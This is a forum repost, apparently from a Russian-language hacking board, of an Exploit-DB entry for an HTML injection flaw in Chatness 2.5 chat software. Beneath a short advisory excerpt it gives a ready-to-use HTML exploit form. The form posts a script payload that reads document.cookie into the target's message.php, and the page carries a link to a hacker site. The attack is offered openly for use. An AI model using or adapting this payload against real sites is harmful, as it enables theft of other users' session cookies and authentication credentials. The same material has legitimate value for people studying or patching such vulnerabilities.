Exploit Chatness 2.5 - 'Message Form' HTML Injection

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
25315
Проверка EDB
  1. Пройдено
Автор
3NITRO
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2005-03-29
HTML:
source: https://www.securityfocus.com/bid/12929/info

Chatness is prone to an HTML injection vulnerability. This issue is exposed through various chat message form fields.

Exploitation will allow an attacker to inject hostile HTML and script code into the session of another user. An attacker could take advantage of this vulnerability to steal cookie-based authentication credentials or launch other attacks. 

<html>
<head>
<title>Chatness 2.5.1 Html Injection Exploit</title>
</head>
<body>
<h1>Chatness 2.5.1 Html Injection Exploit</h1>
<form method="POST" action="http://www.example.com/message.php">
<b>XSS in message.php:</b><p>
Username:
<input type="text" name="message" size="48" value="XSS Injection Code"></p>
<p>
<br>
example: <script>document.write(document.cookie)</script></p>
<p>&nbsp;<input type='submit' name='login' value='RUN!' class='button'></p>
</form>
<p>&nbsp;</p>
<p align="center"><a href="http://www.PersianHacker.NET">www.PersianHacker.NET</a></p>
</body>
</html>
 
Источник
www.exploit-db.com

Похожие темы